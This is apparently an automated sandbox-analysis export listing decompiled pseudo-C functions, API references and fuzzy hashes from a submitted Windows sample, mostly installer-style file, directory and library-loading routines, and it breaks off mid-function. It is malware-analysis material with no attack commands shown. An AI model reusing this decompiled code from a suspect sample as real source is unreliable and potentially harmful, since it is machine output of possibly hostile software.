Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: d3289adf4ebaccc714292094f0131b2a55a31b2be69c8ba73e82ed6e367305b0
Instruction ID: 444e3b163f15bd358be0b4800c507c2147bc3560cfb58e26f6c7225f93e15a3b
Opcode Fuzzy Hash: d3289adf4ebaccc714292094f0131b2a55a31b2be69c8ba73e82ed6e367305b0
Instruction Fuzzy Hash: D621D471904104FACF11AFA5CF48E9E7A71BF48354F20413BF505B91E1DBBD8A929A1D

Uniqueness

Uniqueness Score: -1.00%

Function 732D2A7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x732d5048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x732d505c, 4, 0x40, 0x732d504c); // executed
					 *0x732d505c = 0xc2;
					 *0x732d504c = 0;
					 *0x732d5054 = 0;
					 *0x732d5068 = 0;
					 *0x732d5058 = 0;
					 *0x732d5050 = 0;
					 *0x732d5060 = 0;
					 *0x732d505e = 0;
				}
				return 1;
			}

0x732d2a88
0x732d2a8d
0x732d2a9d
0x732d2aa5
0x732d2aac
0x732d2ab1
0x732d2ab6
0x732d2abb
0x732d2ac0
0x732d2ac5
0x732d2aca
0x732d2aca
0x732d2ad2

APIs

VirtualProtect.KERNELBASE(732D505C,00000004,00000040,732D504C), ref: 732D2A9D

Strings

`gv@Mv, xrefs: 732D2A9D

Memory Dump Source

Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true

Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd

Similarity

API ID: ProtectVirtual
String ID: `gv@Mv
API String ID: 544645111-3191811104
Opcode ID: cb66390778465f57b447f6832e8d170f1eba3a299ca076a0f70dfd3d1012648d
Instruction ID: 8e0f71f6806ed1ac4387cf764322acce11814247806c241965ae1ff6d98cc6fd
Opcode Fuzzy Hash: cb66390778465f57b447f6832e8d170f1eba3a299ca076a0f70dfd3d1012648d
Instruction Fuzzy Hash: FAF092F2D24280DEC350EF2AA4487093BE0B70D207B74C56AE19CD6241E3B440A4EB91

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405E94(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E16(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AC8( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405AE5(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A4B( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040651A(0x7b4000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405E94: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,?,00405F08,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EA2
Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A4B: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A8E

SetCurrentDirectoryW.KERNELBASE(?,007B4000,?,00000000,000000F0), ref: 0040164D

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID:
API String ID: 1892508949-0
Opcode ID: ea366b61ea7e0f954f802211c46f95b4e790a63d7230a0a8c72c366b88b3d3fb
Instruction ID: b26d59bbbb8bd31aa62bfaa3988508fb5429084e49f4d8f394da2dab55023cb6
Opcode Fuzzy Hash: ea366b61ea7e0f954f802211c46f95b4e790a63d7230a0a8c72c366b88b3d3fb
Instruction Fuzzy Hash: E611E631504115EBCF216FA5CD40A9F36A0EF15369B28493BF541B52F1DA3E4A819F4D

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4, struct HWND__* _a10) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7a8a90;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a10 != 0) {
						 *0x7a7a4c =  *0x7a7a4c + _t12;
						SendMessageW(_a10, 0x402, MulDiv( *0x7a7a4c, 0x7530,  *0x7a7a34), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
Instruction ID: 637f0bbede897030ab690e2e99e2181d797c58f7d0d2aab6e1f53bdf2be6ce4b
Opcode Fuzzy Hash: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
Instruction Fuzzy Hash: 9501F432624220ABE7195B389D05B2A3698E751314F10C13FF955F69F1EA78CC02DB4D

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 393b5c21bb7cc3de8bedbfe4bad105ee39a9eabd1884b7fb5bcfa8057cf0f7ce
Instruction ID: 6c41119d880c6e907524726e204bf21ac727531236896e2a35a455d3971ed6d0
Opcode Fuzzy Hash: 393b5c21bb7cc3de8bedbfe4bad105ee39a9eabd1884b7fb5bcfa8057cf0f7ce
Instruction Fuzzy Hash: 62E01272908211CFE705EBA4EE495AE77B4EB40315710497FE501F11D1DBB94D00865D

Uniqueness

Uniqueness Score: -1.00%

Function 004068E7 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004068E7(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E00406877(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x004068ef
0x004068f2
0x004068f9
0x00406901
0x0040690d
0x00000000
0x00406914
0x00406904
0x0040690b
0x00000000
0x0040691c
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
GetProcAddress.KERNEL32(00000000,?), ref: 00406914

Part of subcall function 00406877: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
Part of subcall function 00406877: wsprintfW.USER32 ref: 004068C9
Part of subcall function 00406877: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction ID: 6423a29397ed7bff7b22ace80297d9bc35d616ea5f013efbaa2f78a15a639a79
Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction Fuzzy Hash: CEE08673504210AAE21196716E44C7773A89F89740316443FF946F2080D738DC359AAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040600A Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040600A(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x0040600e
0x0040601b
0x00406030
0x00406036

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\aSsc9zh1ex.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040385A,?), ref: 00406030

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405FE5 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405FE5(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405fea
0x00405ff0
0x00405ff5
0x00405ffe
0x00405ffe
0x00406007

APIs

GetFileAttributesW.KERNELBASE(?,?,00405BEA,?,?,00000000,00405DC0,?,?,?,?), ref: 00405FEA
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FFE

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: e4d3e829c0d5e7da9196b8d45c2199d6a51b20c6ab53065100e3d1aec4738abc
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 4CD01272504130BFC2102728EF0C89BBF95EF64375B024B35FAA5A22F0CB304C638A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405AC8 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AC8(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405ace
0x00405ad6
0x00000000
0x00405adc
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE
GetLastError.KERNEL32 ref: 00405ADC

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 96bb703f3db892353912e36940962cdd7e9d34b0f70b6f3c067145efd4a10b7e
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: 95C04C30344601AEDA105B219E48B1B7AD4DB50741F26853D6146F41A0EA788455DD3D

Uniqueness

Uniqueness Score: -1.00%

Function 732D2B98 Relevance: 1.6, APIs: 1, Instructions: 143
fileCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E732D2B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x732d5050 != 0 && E732D2ADB(_a4) == 0) {
					 *0x732d5054 = _t93;
					if( *0x732d504c != 0) {
						_t93 =  *0x732d504c;
					} else {
						E732D30C0(E732D2AD5(), __ecx);
						 *0x732d504c = _t93;
					}
				}
				_t28 = E732D2B09(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E732D2AFD();
					_t72 = _a4;
					_t79 =  *0x732d5058;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x732d5058 = _t72;
					E732D2AF7();
					_t33 = ReadFile(??, ??, ??, ??, ??); // executed
					 *0x732d5034 = _t33;
					 *0x732d5038 = _t79;
					if( *0x732d5050 != 0 && E732D2ADB( *0x732d5058) == 0) {
						 *0x732d504c = _t94;
						_t94 =  *0x732d5054;
					}
					_t80 =  *0x732d5058;
					_a4 = _t80;
					 *0x732d5058 =  *((intOrPtr*)(E732D2AFD() + _t80));
					_t37 = E732D2AE9(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E732D2B09(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E732D2B14() + _a4 + _v8);
							_push(E732D2B1E());
							if( *0x732d5050 <= 0 || E732D2ADB(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
